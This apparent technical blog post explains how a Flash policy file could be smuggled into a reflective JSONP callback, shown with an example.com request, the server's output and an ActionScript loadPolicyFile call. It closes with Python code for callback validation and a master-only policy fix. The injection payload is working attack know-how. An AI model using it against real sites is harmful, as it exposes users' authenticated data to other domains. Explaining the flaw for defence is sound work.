Flash security policy attacks hit Facebook/MySpace... a techie look at what happened

Flash parses cross-domain policy files (crossdomain.xml) forgivingly. If an attacker can construct an HTTP request that makes the server send back a policy file, Flash will accept it, even when it is embedded in otherwise unrelated output. For instance, imagine a university website that responds to a course listing request:

http://www.example.com/CourseListing?format=js&callback=<cross-domain-policy><allow-access-from%20domain="*"/></cross-domain-policy>

...with the following output:

<cross-domain-policy><allow-access-from domain="*"/></cross-domain-policy>() {  return {name:"English101", desc:"Read Books"}, {name:"Computers101", desc:"play on computers"}};

Then one could load this policy via the following ActionScript code:

System.security.loadPolicyFile("http://www.example.com/CourseListing?format=js&callback=<cross-domain-policy>" + "<allow-access-from%20domain=\"*\"/></cross-domain-policy>");

This results in the Flash application having complete cross-domain access to www.example.com.
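The following Python snippet is an added example, not code from the original post or from any of the sites mentioned: it models the reflective JSONP endpoint above next to a hardened version that only accepts a JavaScript identifier as the callback, plus the master-policy setting that stops Flash from honouring a policy file loaded from an arbitrary URL. The course data, the endpoint functions and the master policy contents are constructed for illustration.

```python
import json
import re

# Constructed sample data standing in for the page's course listing.
COURSES = [{"name": "English101", "desc": "Read Books"},
           {"name": "Computers101", "desc": "play on computers"}]

# The callback value from the page's example request, URL-decoded the way
# the server sees it (%20 has become a space).
INJECTED_CALLBACK = ('<cross-domain-policy><allow-access-from domain="*"/>'
                     '</cross-domain-policy>')

# Accept only a dotted JavaScript identifier such as "app.showCourses";
# angle brackets, quotes and whitespace can never match.
CALLBACK_RE = re.compile(
    r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")


def render_jsonp_vulnerable(callback, data):
    """Echoes the callback verbatim: the reflective pattern the page describes."""
    return "%s(%s);" % (callback, json.dumps(data))


def render_jsonp_hardened(callback, data):
    """Returns the JSONP body, or None when the callback is not an identifier."""
    if not CALLBACK_RE.match(callback):
        return None
    return "%s(%s);" % (callback, json.dumps(data))


def looks_like_policy_file(body):
    """Self-check for non-policy endpoints: this tag must never appear."""
    return "<cross-domain-policy" in body


# Master policy (hypothetical content) served at /crossdomain.xml. With
# "master-only", Flash ignores policy files fetched from any other URL,
# so loadPolicyFile() against the reflective endpoint grants nothing.
MASTER_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>
"""

if __name__ == "__main__":
    bad = render_jsonp_vulnerable(INJECTED_CALLBACK, COURSES)
    print("vulnerable endpoint emits a policy:", looks_like_policy_file(bad))
    print("hardened endpoint, injected callback:",
          render_jsonp_hardened(INJECTED_CALLBACK, COURSES))
    print("hardened endpoint, valid callback:",
          render_jsonp_hardened("showCourses", COURSES))
```

The callback check is the per-endpoint fix; the master-only setting is the site-wide one, and a site that needs real cross-domain access should deploy both.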
